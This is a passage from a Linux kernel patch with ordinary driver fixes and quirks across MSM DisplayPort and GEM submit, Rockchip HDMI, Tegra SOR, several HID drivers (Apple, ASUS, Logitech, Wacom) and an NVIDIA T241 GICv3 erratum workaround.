++void dp_unregister_audio_driver(struct device *dev, struct dp_audio *dp_audio);
++
+ /**
+  * dp_audio_put()
+  *
+diff --git a/drivers/gpu/drm/msm/dp/dp_aux.c b/drivers/gpu/drm/msm/dp/dp_aux.c
+index cc3efed593aa1..84f9e3e5f9642 100644
+--- a/drivers/gpu/drm/msm/dp/dp_aux.c
++++ b/drivers/gpu/drm/msm/dp/dp_aux.c
+@@ -162,47 +162,6 @@ static ssize_t dp_aux_cmd_fifo_rx(struct dp_aux_private *aux,
+ 	return i;
+ }
+ 
+-static void dp_aux_native_handler(struct dp_aux_private *aux, u32 isr)
+-{
+-	if (isr & DP_INTR_AUX_I2C_DONE)
+-		aux->aux_error_num = DP_AUX_ERR_NONE;
+-	else if (isr & DP_INTR_WRONG_ADDR)
+-		aux->aux_error_num = DP_AUX_ERR_ADDR;
+-	else if (isr & DP_INTR_TIMEOUT)
+-		aux->aux_error_num = DP_AUX_ERR_TOUT;
+-	if (isr & DP_INTR_NACK_DEFER)
+-		aux->aux_error_num = DP_AUX_ERR_NACK;
+-	if (isr & DP_INTR_AUX_ERROR) {
+-		aux->aux_error_num = DP_AUX_ERR_PHY;
+-		dp_catalog_aux_clear_hw_interrupts(aux->catalog);
+-	}
+-}
+-
+-static void dp_aux_i2c_handler(struct dp_aux_private *aux, u32 isr)
+-{
+-	if (isr & DP_INTR_AUX_I2C_DONE) {
+-		if (isr & (DP_INTR_I2C_NACK | DP_INTR_I2C_DEFER))
+-			aux->aux_error_num = DP_AUX_ERR_NACK;
+-		else
+-			aux->aux_error_num = DP_AUX_ERR_NONE;
+-	} else {
+-		if (isr & DP_INTR_WRONG_ADDR)
+-			aux->aux_error_num = DP_AUX_ERR_ADDR;
+-		else if (isr & DP_INTR_TIMEOUT)
+-			aux->aux_error_num = DP_AUX_ERR_TOUT;
+-		if (isr & DP_INTR_NACK_DEFER)
+-			aux->aux_error_num = DP_AUX_ERR_NACK_DEFER;
+-		if (isr & DP_INTR_I2C_NACK)
+-			aux->aux_error_num = DP_AUX_ERR_NACK;
+-		if (isr & DP_INTR_I2C_DEFER)
+-			aux->aux_error_num = DP_AUX_ERR_DEFER;
+-		if (isr & DP_INTR_AUX_ERROR) {
+-			aux->aux_error_num = DP_AUX_ERR_PHY;
+-			dp_catalog_aux_clear_hw_interrupts(aux->catalog);
+-		}
+-	}
+-}
+-
+ static void dp_aux_update_offset_and_segment(struct dp_aux_private *aux,
+ 					     struct drm_dp_aux_msg *input_msg)
+ {
+@@ -427,13 +386,42 @@ void dp_aux_isr(struct drm_dp_aux *dp_aux)
+ 	if (!isr)
+ 		return;
+ 
+-	if (!aux->cmd_busy)
++	if (!aux->cmd_busy) {
++		DRM_ERROR("Unexpected DP AUX IRQ %#010x when not busy\n", isr);
+ 		return;
++	}
+ 
+-	if (aux->native)
+-		dp_aux_native_handler(aux, isr);
+-	else
+-		dp_aux_i2c_handler(aux, isr);
++	/*
++	 * The logic below assumes only one error bit is set (other than "done"
++	 * which can apparently be set at the same time as some of the other
++	 * bits). Warn if more than one get set so we know we need to improve
++	 * the logic.
++	 */
++	if (hweight32(isr & ~DP_INTR_AUX_XFER_DONE) > 1)
++		DRM_WARN("Some DP AUX interrupts unhandled: %#010x\n", isr);
++
++	if (isr & DP_INTR_AUX_ERROR) {
++		aux->aux_error_num = DP_AUX_ERR_PHY;
++		dp_catalog_aux_clear_hw_interrupts(aux->catalog);
++	} else if (isr & DP_INTR_NACK_DEFER) {
++		aux->aux_error_num = DP_AUX_ERR_NACK_DEFER;
++	} else if (isr & DP_INTR_WRONG_ADDR) {
++		aux->aux_error_num = DP_AUX_ERR_ADDR;
++	} else if (isr & DP_INTR_TIMEOUT) {
++		aux->aux_error_num = DP_AUX_ERR_TOUT;
++	} else if (!aux->native && (isr & DP_INTR_I2C_NACK)) {
++		aux->aux_error_num = DP_AUX_ERR_NACK;
++	} else if (!aux->native && (isr & DP_INTR_I2C_DEFER)) {
++		if (isr & DP_INTR_AUX_XFER_DONE)
++			aux->aux_error_num = DP_AUX_ERR_NACK;
++		else
++			aux->aux_error_num = DP_AUX_ERR_DEFER;
++	} else if (isr & DP_INTR_AUX_XFER_DONE) {
++		aux->aux_error_num = DP_AUX_ERR_NONE;
++	} else {
++		DRM_WARN("Unexpected interrupt: %#010x\n", isr);
++		return;
++	}
+ 
+ 	complete(&aux->comp);
+ }
+diff --git a/drivers/gpu/drm/msm/dp/dp_catalog.c b/drivers/gpu/drm/msm/dp/dp_catalog.c
+index 676279d0ca8d9..421391755427d 100644
+--- a/drivers/gpu/drm/msm/dp/dp_catalog.c
++++ b/drivers/gpu/drm/msm/dp/dp_catalog.c
+@@ -27,7 +27,7 @@
+ #define DP_INTF_CONFIG_DATABUS_WIDEN     BIT(4)
+ 
+ #define DP_INTERRUPT_STATUS1 \
+-	(DP_INTR_AUX_I2C_DONE| \
++	(DP_INTR_AUX_XFER_DONE| \
+ 	DP_INTR_WRONG_ADDR | DP_INTR_TIMEOUT | \
+ 	DP_INTR_NACK_DEFER | DP_INTR_WRONG_DATA_CNT | \
+ 	DP_INTR_I2C_NACK | DP_INTR_I2C_DEFER | \
+diff --git a/drivers/gpu/drm/msm/dp/dp_catalog.h b/drivers/gpu/drm/msm/dp/dp_catalog.h
+index 1f717f45c1158..f36b7b372a065 100644
+--- a/drivers/gpu/drm/msm/dp/dp_catalog.h
++++ b/drivers/gpu/drm/msm/dp/dp_catalog.h
+@@ -13,7 +13,7 @@
+ 
+ /* interrupts */
+ #define DP_INTR_HPD		BIT(0)
+-#define DP_INTR_AUX_I2C_DONE	BIT(3)
++#define DP_INTR_AUX_XFER_DONE	BIT(3)
+ #define DP_INTR_WRONG_ADDR	BIT(6)
+ #define DP_INTR_TIMEOUT		BIT(9)
+ #define DP_INTR_NACK_DEFER	BIT(12)
+diff --git a/drivers/gpu/drm/msm/dp/dp_display.c b/drivers/gpu/drm/msm/dp/dp_display.c
+index c9d9b384ddd03..57b82e5d0ab12 100644
+--- a/drivers/gpu/drm/msm/dp/dp_display.c
++++ b/drivers/gpu/drm/msm/dp/dp_display.c
+@@ -323,6 +323,7 @@ static void dp_display_unbind(struct device *dev, struct device *master,
+ 	kthread_stop(dp->ev_tsk);
+ 
+ 	dp_power_client_deinit(dp->power);
++	dp_unregister_audio_driver(dev, dp->audio);
+ 	dp_aux_unregister(dp->aux);
+ 	dp->drm_dev = NULL;
+ 	dp->aux->drm_dev = NULL;
+diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
+index d8c9d184190bb..d6162561141c5 100644
+--- a/drivers/gpu/drm/msm/msm_gem_submit.c
++++ b/drivers/gpu/drm/msm/msm_gem_submit.c
+@@ -709,7 +709,7 @@ int msm_ioctl_gem_submit(struct drm_device *dev, void *data,
+ 	struct msm_drm_private *priv = dev->dev_private;
+ 	struct drm_msm_gem_submit *args = data;
+ 	struct msm_file_private *ctx = file->driver_priv;
+-	struct msm_gem_submit *submit;
++	struct msm_gem_submit *submit = NULL;
+ 	struct msm_gpu *gpu = priv->gpu;
+ 	struct msm_gpu_submitqueue *queue;
+ 	struct msm_ringbuffer *ring;
+@@ -756,13 +756,15 @@ int msm_ioctl_gem_submit(struct drm_device *dev, void *data,
+ 		out_fence_fd = get_unused_fd_flags(O_CLOEXEC);
+ 		if (out_fence_fd < 0) {
+ 			ret = out_fence_fd;
+-			return ret;
++			goto out_post_unlock;
+ 		}
+ 	}
+ 
+ 	submit = submit_create(dev, gpu, queue, args->nr_bos, args->nr_cmds);
+-	if (IS_ERR(submit))
+-		return PTR_ERR(submit);
++	if (IS_ERR(submit)) {
++		ret = PTR_ERR(submit);
++		goto out_post_unlock;
++	}
+ 
+ 	trace_msm_gpu_submit(pid_nr(submit->pid), ring->id, submit->ident,
+ 		args->nr_bos, args->nr_cmds);
+@@ -945,11 +947,20 @@ out:
+ 	if (has_ww_ticket)
+ 		ww_acquire_fini(&submit->ticket);
+ out_unlock:
+-	if (ret && (out_fence_fd >= 0))
+-		put_unused_fd(out_fence_fd);
+ 	mutex_unlock(&queue->lock);
+ out_post_unlock:
+-	msm_gem_submit_put(submit);
++	if (ret && (out_fence_fd >= 0))
++		put_unused_fd(out_fence_fd);
++
++	if (!IS_ERR_OR_NULL(submit)) {
++		msm_gem_submit_put(submit);
++	} else {
++		/*
++		 * If the submit hasn't yet taken ownership of the queue
++		 * then we need to drop the reference ourself:
++		 */
++		msm_submitqueue_put(queue);
++	}
+ 	if (!IS_ERR_OR_NULL(post_deps)) {
+ 		for (i = 0; i < args->nr_out_syncobjs; ++i) {
+ 			kfree(post_deps[i].chain);
+diff --git a/drivers/gpu/drm/rockchip/dw_hdmi-rockchip.c b/drivers/gpu/drm/rockchip/dw_hdmi-rockchip.c
+index 2f4b8f64cbad3..ae857bf8bd624 100644
+--- a/drivers/gpu/drm/rockchip/dw_hdmi-rockchip.c
++++ b/drivers/gpu/drm/rockchip/dw_hdmi-rockchip.c
+@@ -640,6 +640,7 @@ static void dw_hdmi_rockchip_unbind(struct device *dev, struct device *master,
+ 	struct rockchip_hdmi *hdmi = dev_get_drvdata(dev);
+ 
+ 	dw_hdmi_unbind(hdmi->hdmi);
++	drm_encoder_cleanup(&hdmi->encoder.encoder);
+ 	clk_disable_unprepare(hdmi->ref_clk);
+ 
+ 	regulator_disable(hdmi->avdd_1v8);
+diff --git a/drivers/gpu/drm/tegra/sor.c b/drivers/gpu/drm/tegra/sor.c
+index 8af632740673a..77723d5f1d3fd 100644
+--- a/drivers/gpu/drm/tegra/sor.c
++++ b/drivers/gpu/drm/tegra/sor.c
+@@ -1153,7 +1153,7 @@ static int tegra_sor_compute_config(struct tegra_sor *sor,
+ 				    struct drm_dp_link *link)
+ {
+ 	const u64 f = 100000, link_rate = link->rate * 1000;
+-	const u64 pclk = mode->clock * 1000;
++	const u64 pclk = (u64)mode->clock * 1000;
+ 	u64 input, output, watermark, num;
+ 	struct tegra_sor_params params;
+ 	u32 num_syms_per_line;
+diff --git a/drivers/hid/hid-apple.c b/drivers/hid/hid-apple.c
+index c671ce94671ca..37b2ce9b50fe8 100644
+--- a/drivers/hid/hid-apple.c
++++ b/drivers/hid/hid-apple.c
+@@ -854,14 +854,16 @@ static const struct hid_device_id apple_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER3_ANSI),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER3_ISO),
+-		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
++		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN |
++			APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER3_JIS),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN |
+ 			APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_ANSI),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_ISO),
+-		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
++		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN |
++			APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_JIS),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN |
+ 			APPLE_RDESC_JIS },
+@@ -880,7 +882,8 @@ static const struct hid_device_id apple_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_HF_ANSI),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_HF_ISO),
+-		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
++		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN |
++			APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_HF_JIS),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN |
+ 			APPLE_RDESC_JIS },
+@@ -921,31 +924,31 @@ static const struct hid_device_id apple_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING_ANSI),
+ 		.driver_data = APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING_ISO),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING_JIS),
+ 		.driver_data = APPLE_HAS_FN | APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING2_ANSI),
+ 		.driver_data = APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING2_ISO),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING2_JIS),
+ 		.driver_data = APPLE_HAS_FN | APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING3_ANSI),
+ 		.driver_data = APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING3_ISO),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING3_JIS),
+ 		.driver_data = APPLE_HAS_FN | APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING4_ANSI),
+ 		.driver_data = APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING4_ISO),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING4_JIS),
+ 		.driver_data = APPLE_HAS_FN | APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING4A_ANSI),
+ 		.driver_data = APPLE_HAS_FN },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING4A_ISO),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING4A_JIS),
+ 		.driver_data = APPLE_HAS_FN | APPLE_RDESC_JIS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRING5_ANSI),
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 2235d78784b1b..53c6692d77714 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -415,6 +415,7 @@
+ #define I2C_DEVICE_ID_HP_SPECTRE_X360_15	0x2817
+ #define I2C_DEVICE_ID_HP_SPECTRE_X360_13_AW0020NG  0x29DF
+ #define I2C_DEVICE_ID_ASUS_TP420IA_TOUCHSCREEN 0x2BC8
++#define I2C_DEVICE_ID_ASUS_GV301RA_TOUCHSCREEN 0x2C82
+ #define USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN	0x2544
+ #define USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN	0x2706
+ #define I2C_DEVICE_ID_SURFACE_GO_TOUCHSCREEN	0x261A
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index c3f80b516f398..3acaaca888acd 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -372,6 +372,8 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_ASUS_TP420IA_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_ASUS_GV301RA_TOUCHSCREEN),
++	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN),
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index e906ee375298a..b2cd7527de195 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -838,8 +838,7 @@ static int hidpp_unifying_init(struct hidpp_device *hidpp)
+ 	if (ret)
+ 		return ret;
+ 
+-	snprintf(hdev->uniq, sizeof(hdev->uniq), "%04x-%4phD",
+-		 hdev->product, &serial);
++	snprintf(hdev->uniq, sizeof(hdev->uniq), "%4phD", &serial);
+ 	dbg_hid("HID++ Unifying: Got serial: %s\n", hdev->uniq);
+ 
+ 	name = hidpp_unifying_get_name(hidpp);
+@@ -932,6 +931,54 @@ print_version:
+ 	return 0;
+ }
+ 
++/* -------------------------------------------------------------------------- */
++/* 0x0003: Device Information                                                 */
++/* -------------------------------------------------------------------------- */
++
++#define HIDPP_PAGE_DEVICE_INFORMATION			0x0003
++
++#define CMD_GET_DEVICE_INFO				0x00
++
++static int hidpp_get_serial(struct hidpp_device *hidpp, u32 *serial)
++{
++	struct hidpp_report response;
++	u8 feature_type;
++	u8 feature_index;
++	int ret;
++
++	ret = hidpp_root_get_feature(hidpp, HIDPP_PAGE_DEVICE_INFORMATION,
++				     &feature_index,
++				     &feature_type);
++	if (ret)
++		return ret;
++
++	ret = hidpp_send_fap_command_sync(hidpp, feature_index,
++					  CMD_GET_DEVICE_INFO,
++					  NULL, 0, &response);
++	if (ret)
++		return ret;
++
++	/* See hidpp_unifying_get_serial() */
++	*serial = *((u32 *)&response.rap.params[1]);
++	return 0;
++}
++
++static int hidpp_serial_init(struct hidpp_device *hidpp)
++{
++	struct hid_device *hdev = hidpp->hid_dev;
++	u32 serial;
++	int ret;
++
++	ret = hidpp_get_serial(hidpp, &serial);
++	if (ret)
++		return ret;
++
++	snprintf(hdev->uniq, sizeof(hdev->uniq), "%4phD", &serial);
++	dbg_hid("HID++ DeviceInformation: Got serial: %s\n", hdev->uniq);
++
++	return 0;
++}
++
+ /* -------------------------------------------------------------------------- */
+ /* 0x0005: GetDeviceNameType                                                  */
+ /* -------------------------------------------------------------------------- */
+@@ -4194,6 +4241,8 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 
+ 	if (hidpp->quirks & HIDPP_QUIRK_UNIFYING)
+ 		hidpp_unifying_init(hidpp);
++	else if (hid_is_usb(hidpp->hid_dev))
++		hidpp_serial_init(hidpp);
+ 
+ 	connected = hidpp_root_get_protocol_version(hidpp) == 0;
+ 	atomic_set(&hidpp->connected, connected);
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 0c6a82c665c1d..d2f500242ed40 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -1963,18 +1963,7 @@ static void wacom_map_usage(struct input_dev *input, struct hid_usage *usage,
+ static void wacom_wac_battery_usage_mapping(struct hid_device *hdev,
+ 		struct hid_field *field, struct hid_usage *usage)
+ {
+-	struct wacom *wacom = hid_get_drvdata(hdev);
+-	struct wacom_wac *wacom_wac = &wacom->wacom_wac;
+-	struct wacom_features *features = &wacom_wac->features;
+-	unsigned equivalent_usage = wacom_equivalent_usage(usage->hid);
+-
+-	switch (equivalent_usage) {
+-	case HID_DG_BATTERYSTRENGTH:
+-	case WACOM_HID_WD_BATTERY_LEVEL:
+-	case WACOM_HID_WD_BATTERY_CHARGING:
+-		features->quirks |= WACOM_QUIRK_BATTERY;
+-		break;
+-	}
++	return;
+ }
+ 
+ static void wacom_wac_battery_event(struct hid_device *hdev, struct hid_field *field,
+@@ -1995,18 +1984,21 @@ static void wacom_wac_battery_event(struct hid_device *hdev, struct hid_field *f
+ 			wacom_wac->hid_data.bat_connected = 1;
+ 			wacom_wac->hid_data.bat_status = WACOM_POWER_SUPPLY_STATUS_AUTO;
+ 		}
++		wacom_wac->features.quirks |= WACOM_QUIRK_BATTERY;
+ 		break;
+ 	case WACOM_HID_WD_BATTERY_LEVEL:
+ 		value = value * 100 / (field->logical_maximum - field->logical_minimum);
+ 		wacom_wac->hid_data.battery_capacity = value;
+ 		wacom_wac->hid_data.bat_connected = 1;
+ 		wacom_wac->hid_data.bat_status = WACOM_POWER_SUPPLY_STATUS_AUTO;
++		wacom_wac->features.quirks |= WACOM_QUIRK_BATTERY;
+ 		break;
+ 	case WACOM_HID_WD_BATTERY_CHARGING:
+ 		wacom_wac->hid_data.bat_charging = value;
+ 		wacom_wac->hid_data.ps_connected = value;
+ 		wacom_wac->hid_data.bat_connected = 1;
+ 		wacom_wac->hid_data.bat_status = WACOM_POWER_SUPPLY_STATUS_AUTO;
++		wacom_wac->features.quirks |= WACOM_QUIRK_BATTERY;
+ 		break;
+ 	}
+ }
+@@ -2022,18 +2014,15 @@ static void wacom_wac_battery_report(struct hid_device *hdev,
+ {
+ 	struct wacom *wacom = hid_get_drvdata(hdev);
+ 	struct wacom_wac *wacom_wac = &wacom->wacom_wac;
+-	struct wacom_features *features = &wacom_wac->features;
+ 
+-	if (features->quirks & WACOM_QUIRK_BATTERY) {
+-		int status = wacom_wac->hid_data.bat_status;
+-		int capacity = wacom_wac->hid_data.battery_capacity;
+-		bool charging = wacom_wac->hid_data.bat_charging;
+-		bool connected = wacom_wac->hid_data.bat_connected;
+-		bool powered = wacom_wac->hid_data.ps_connected;
++	int status = wacom_wac->hid_data.bat_status;
++	int capacity = wacom_wac->hid_data.battery_capacity;
++	bool charging = wacom_wac->hid_data.bat_charging;
++	bool connected = wacom_wac->hid_data.bat_connected;
++	bool powered = wacom_wac->hid_data.ps_connected;
+ 
+-		wacom_notify_battery(wacom_wac, status, capacity, charging,
+-				     connected, powered);
+-	}
++	wacom_notify_battery(wacom_wac, status, capacity, charging,
++			     connected, powered);
+ }
+ 
+ static void wacom_wac_pad_usage_mapping(struct hid_device *hdev,
+diff --git a/drivers/irqchip/Kconfig b/drivers/irqchip/Kconfig
+index 7ef9f5e696d31..a29a426e4eed7 100644
+--- a/drivers/irqchip/Kconfig
++++ b/drivers/irqchip/Kconfig
+@@ -35,6 +35,7 @@ config ARM_GIC_V3
+ 	select IRQ_DOMAIN_HIERARCHY
+ 	select PARTITION_PERCPU
+ 	select GENERIC_IRQ_EFFECTIVE_AFF_MASK if SMP
++	select HAVE_ARM_SMCCC_DISCOVERY
+ 
+ config ARM_GIC_V3_ITS
+ 	bool
+diff --git a/drivers/irqchip/irq-gic-v3.c b/drivers/irqchip/irq-gic-v3.c
+index 34d58567b78d1..2182f87d2d12e 100644
+--- a/drivers/irqchip/irq-gic-v3.c
++++ b/drivers/irqchip/irq-gic-v3.c
+@@ -23,6 +23,9 @@
+ #include <linux/irqchip/arm-gic-common.h>
+ #include <linux/irqchip/arm-gic-v3.h>
+ #include <linux/irqchip/irq-partition-percpu.h>
++#include <linux/bitfield.h>
++#include <linux/bits.h>
++#include <linux/arm-smccc.h>
+ 
+ #include <asm/cputype.h>
+ #include <asm/exception.h>
+@@ -46,6 +49,7 @@ struct redist_region {
+ 
+ struct gic_chip_data {
+ 	struct fwnode_handle	*fwnode;
++	phys_addr_t		dist_phys_base;
+ 	void __iomem		*dist_base;
+ 	struct redist_region	*redist_regions;
+ 	struct rdists		rdists;
+@@ -58,6 +62,10 @@ struct gic_chip_data {
+ 	struct partition_desc	**ppi_descs;
+ };
+ 
++#define T241_CHIPS_MAX		4
++static void __iomem *t241_dist_base_alias[T241_CHIPS_MAX] __read_mostly;
++static DEFINE_STATIC_KEY_FALSE(gic_nvidia_t241_erratum);
++
+ static struct gic_chip_data gic_data __read_mostly;
+ static DEFINE_STATIC_KEY_TRUE(supports_deactivate_key);
+ 
+@@ -187,6 +195,39 @@ static inline bool gic_irq_in_rdist(struct irq_data *d)
+ 	}
+ }
+ 
++static inline void __iomem *gic_dist_base_alias(struct irq_data *d)
++{
++	if (static_branch_unlikely(&gic_nvidia_t241_erratum)) {
++		irq_hw_number_t hwirq = irqd_to_hwirq(d);
++		u32 chip;
++
++		/*
++		 * For the erratum T241-FABRIC-4, read accesses to GICD_In{E}
++		 * registers are directed to the chip that owns the SPI. The
++		 * the alias region can also be used for writes to the
++		 * GICD_In{E} except GICD_ICENABLERn. Each chip has support
++		 * for 320 {E}SPIs. Mappings for all 4 chips:
++		 *    Chip0 = 32-351
++		 *    Chip1 = 352-671
++		 *    Chip2 = 672-991
++		 *    Chip3 = 4096-4415
++		 */
++		switch (__get_intid_range(hwirq)) {
++		case SPI_RANGE:
++			chip = (hwirq - 32) / 320;
++			break;
++		case ESPI_RANGE:
++			chip = 3;
++			break;
++		default:
++			unreachable();
++		}
++		return t241_dist_base_alias[chip];
++	}
++
++	return gic_data.dist_base;
++}
++
+ static inline void __iomem *gic_dist_base(struct irq_data *d)
+ {
+ 	switch (get_intid_range(d)) {
+@@ -345,7 +386,7 @@ static int gic_peek_irq(struct irq_data *d, u32 offset)
+ 	if (gic_irq_in_rdist(d))
+ 		base = gic_data_rdist_sgi_base();
+ 	else
+-		base = gic_data.dist_base;
++		base = gic_dist_base_alias(d);
+ 
+ 	return !!(readl_relaxed(base + offset + (index / 32) * 4) & mask);
+ }
+@@ -596,7 +637,7 @@ static int gic_set_type(struct irq_data *d, unsigned int type)
+ 	if (gic_irq_in_rdist(d))
+ 		base = gic_data_rdist_sgi_base();
+ 	else
+-		base = gic_data.dist_base;
++		base = gic_dist_base_alias(d);
+ 
+ 	offset = convert_offset_index(d, GICD_ICFGR, &index);
+ 
+@@ -1718,6 +1759,43 @@ static bool gic_enable_quirk_hip06_07(void *data)
+ 	return false;
+ }
+ 
++#define T241_CHIPN_MASK		GENMASK_ULL(45, 44)
++#define T241_CHIP_GICDA_OFFSET	0x1580000
++#define SMCCC_SOC_ID_T241	0x036b0241
++
++static bool gic_enable_quirk_nvidia_t241(void *data)
++{
++	s32 soc_id = arm_smccc_get_soc_id_version();
++	unsigned long chip_bmask = 0;
++	phys_addr_t phys;
++	u32 i;
++
++	/* Check JEP106 code for NVIDIA T241 chip (036b:0241) */
++	if ((soc_id < 0) || (soc_id != SMCCC_SOC_ID_T241))
++		return false;
++
++	/* Find the chips based on GICR regions PHYS addr */
++	for (i = 0; i < gic_data.nr_redist_regions; i++) {
++		chip_bmask |= BIT(FIELD_GET(T241_CHIPN_MASK,
++				  (u64)gic_data.redist_regions[i].phys_base));
++	}
++
++	if (hweight32(chip_bmask) < 3)
++		return false;
++
++	/* Setup GICD alias regions */
++	for (i = 0; i < ARRAY_SIZE(t241_dist_base_alias); i++) {
++		if (chip_bmask & BIT(i)) {
++			phys = gic_data.dist_phys_base + T241_CHIP_GICDA_OFFSET;
++			phys |= FIELD_PREP(T241_CHIPN_MASK, i);
++			t241_dist_base_alias[i] = ioremap(phys, SZ_64K);
++			WARN_ON_ONCE(!t241_dist_base_alias[i]);
++		}
++	}
++	static_branch_enable(&gic_nvidia_t241_erratum);
++	return true;
++}
++
+ static const struct gic_quirk gic_quirks[] = {
+ 	{
+ 		.desc	= "GICv3: Qualcomm MSM8996 broken firmware",
+@@ -1749,6 +1827,12 @@ static const struct gic_quirk gic_quirks[] = {
+ 		.mask	= 0xe8f00fff,
+ 		.init	= gic_enable_quirk_cavium_38539,
+ 	},
++	{
++		.desc	= "GICv3: NVIDIA erratum T241-FABRIC-4",
++		.iidr	= 0x0402043b,
++		.mask	= 0xffffffff,
++		.init	= gic_enable_quirk_nvidia_t241,
++	},
+ 	{
+ 	}
+ };
+@@ -1816,7 +1900,8 @@ static void gic_enable_nmi_support(void)
+ 		gic_chip.flags |= IRQCHIP_SUPPORTS_NMI;
+ }
+ 
+-static int __init gic_init_bases(void __iomem *dist_base,
